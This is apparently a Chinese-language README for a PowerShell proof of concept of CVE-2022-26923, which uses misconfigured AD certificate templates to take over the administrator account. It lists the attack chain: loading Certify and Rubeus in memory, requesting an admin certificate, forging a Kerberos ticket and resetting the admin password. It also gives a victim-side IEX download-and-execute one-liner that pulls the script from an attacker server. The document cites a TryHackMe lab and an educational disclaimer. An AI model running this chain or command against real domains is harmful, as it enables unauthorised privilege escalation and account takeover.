CVE-2022-26923-Powershell-POC
一个用于从内存中加载并自动运行Certify和Rubeus的Powershell PoC。
工作原理?
- 将Certify.exe和Rubeus.exe加载到内存中。
- 扫描目标机器是否存在配置错误的证书模板。(更多信息请访问 https://www.youtube.com/watch?v=HBRCI5O35R8)
- 基于存在漏洞的模板,为管理员用户请求证书。
- 将证书发送给证书处理程序,该程序将其转换为.pfx格式并返回给客户端。
- 利用Rubeus加载证书并为管理员用户生成票据。
- 更改管理员用户的密码。(仅用于演示)
该PoC已在以下TryHackMe实验室中测试:https://tryhackme.com/room/adcertificatetemplates
此CVE用于权限提升,因此该演示及THM实验室均不涉及初始利用。
步骤:
- python3 -m http.server 80 [攻击机]
- python3 uploader.py 8000 [攻击机]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [受害机]
注意:此PoC仅供教育目的,您需对自己的行为负责。